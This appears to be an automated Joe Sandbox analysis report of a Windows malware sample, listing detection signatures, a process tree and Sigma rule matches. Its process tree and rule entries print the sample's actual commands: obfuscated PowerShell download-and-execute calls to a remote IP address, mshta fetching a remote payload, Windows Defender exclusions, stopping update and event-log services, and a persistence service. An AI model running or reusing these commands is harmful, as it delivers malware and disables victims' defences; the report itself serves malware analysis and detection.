Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1577458
MD5:16b50170fda201194a611ca41219be7d
SHA1:2ddda36084918cf436271451b49519a2843f403f
SHA256:a542a2170abf4de0cd79baeb2e8f08deaf6fdeea40e9fc1ec15cbeb988e7900a
Tags:bulletproofexeuser-abus3reports
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Powershell download and execute
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Downloads files with wrong headers with respect to MIME Content-Type
Found direct / indirect Syscall (likely to bypass EDR)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
PE file contains section with special chars
Potential malicious VBS script found (suspicious strings)
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade debugger and weak emulator (self modifying code)
Uses powercfg.exe to modify the power settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6492 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 16B50170FDA201194A611CA41219BE7D)
    • wscript.exe (PID: 4508 cmdline: "wscript" C:\Users\user\AppData\Local\Temp\tempScript.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 404 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wscript.exe (PID: 7352 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\CMD.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • cmd.exe (PID: 7400 cmdline: "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • mshta.exe (PID: 7444 cmdline: mshta http://176.113.115.178/Windows-Update MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
              • powershell.exe (PID: 7616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 7784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • WmiPrvSE.exe (PID: 7928 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
                • LB31.exe (PID: 3352 cmdline: "C:\Users\user\AppData\Roaming\LB31.exe" MD5: C9E6AA21979D5FC710F1F2E8226D9DFE)
                  • powershell.exe (PID: 8084 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
                    • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • cmd.exe (PID: 2184 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • wusa.exe (PID: 6088 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
                  • sc.exe (PID: 6104 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
                    • conhost.exe (PID: 4068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • sc.exe (PID: 6564 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
                    • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • sc.exe (PID: 5544 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
                    • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • sc.exe (PID: 880 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
                    • conhost.exe (PID: 4200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • sc.exe (PID: 1812 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
                    • conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powercfg.exe (PID: 504 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
                    • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powercfg.exe (PID: 2672 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
                    • conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powercfg.exe (PID: 6516 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
                    • conhost.exe (PID: 2760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powercfg.exe (PID: 6068 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
                    • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • dialer.exe (PID: 2748 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
                    • winlogon.exe (PID: 560 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
                    • lsass.exe (PID: 652 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
                    • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
                    • dwm.exe (PID: 996 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
                    • svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
                  • sc.exe (PID: 6816 cmdline: C:\Windows\system32\sc.exe delete "LIB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
                    • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • sc.exe (PID: 7872 cmdline: C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
                    • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • sc.exe (PID: 6644 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
                    • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • sc.exe (PID: 6780 cmdline: C:\Windows\system32\sc.exe start "LIB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
                    • conhost.exe (PID: 2432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 936 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7608 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Mig.exe (PID: 4140 cmdline: C:\ProgramData\Mig\Mig.exe MD5: C9E6AA21979D5FC710F1F2E8226D9DFE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 404JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 936JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 7616JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_404.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          amsi64_936.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi64_7616.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

              Sigma Signatures

              Change of critical system settings

              barindex
              Sigma detected: Disable power options
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\LB31.exe" , ParentImage: C:\Users\user\AppData\Roaming\LB31.exe, ParentProcessId: 3352, ParentProcessName: LB31.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 504, ProcessName: powercfg.exe

              System Summary

              barindex
              Sigma detected: Potentially Suspicious PowerShell Child Processes
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\CMD.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\CMD.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 404, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\CMD.vbs" , ProcessId: 7352, ProcessName: wscript.exe
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7616, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, ProcessId: 7784, ProcessName: powershell.exe
              Sigma detected: Script Interpreter Execution From Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "wscript" C:\Users\user\AppData\Local\Temp\tempScript.js, CommandLine: "wscript" C:\Users\user\AppData\Local\Temp\tempScript.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6492, ParentProcessName: file.exe, ProcessCommandLine: "wscript" C:\Users\user\AppData\Local\Temp\tempScript.js, ProcessId: 4508, ProcessName: wscript.exe
              Sigma detected: Suspicious MSHTA Child Process
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://176.113.115.178/Windows-Update, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7444, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , ProcessId: 7616, ProcessName: powershell.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "wscript" C:\Users\user\AppData\Local\Temp\tempScript.js, CommandLine: "wscript" C:\Users\user\AppData\Local\Temp\tempScript.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6492, ParentProcessName: file.exe, ProcessCommandLine: "wscript" C:\Users\user\AppData\Local\Temp\tempScript.js, ProcessId: 4508, ProcessName: wscript.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "wscript" C:\Users\user\AppData\Local\Temp\tempScript.js, CommandLine: "wscript" C:\Users\user\AppData\Local\Temp\tempScript.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6492, ParentProcessName: file.exe, ProcessCommandLine: "wscript" C:\Users\user\AppData\Local\Temp\tempScript.js, ProcessId: 4508, ProcessName: wscript.exe
              Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update, CommandLine: "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\CMD.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7352, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update, ProcessId: 7400, ProcessName: cmd.exe
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 404, TargetFilename: C:\Users\user\AppData\Roaming\CMD.vbs
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7616, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, ProcessId: 7784, ProcessName: powershell.exe
              Sigma detected: Uncommon Svchost Parent Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 2748, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "wscript" C:\Users\user\AppData\Local\Temp\tempScript.js, CommandLine: "wscript" C:\Users\user\AppData\Local\Temp\tempScript.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6492, ParentProcessName: file.exe, ProcessCommandLine: "wscript" C:\Users\user\AppData\Local\Temp\tempScript.js, ProcessId: 4508, ProcessName: wscript.exe
              Sigma detected: New Service Creation Using Sc.EXE
              Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\LB31.exe" , ParentImage: C:\Users\user\AppData\Roaming\LB31.exe, ParentProcessId: 3352, ParentProcessName: LB31.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto", ProcessId: 7872, ProcessName: sc.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "wscript" C:\Users\user\AppData\Local\Temp\tempScript.js, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4508, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , ProcessId: 404, ProcessName: powershell.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7608, ProcessName: svchost.exe

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Sigma detected: Stop EventLog
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\LB31.exe" , ParentImage: C:\Users\user\AppData\Roaming\LB31.exe, ParentProcessId: 3352, ParentProcessName: LB31.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 6644, ProcessName: sc.exe

              Suricata Signatures

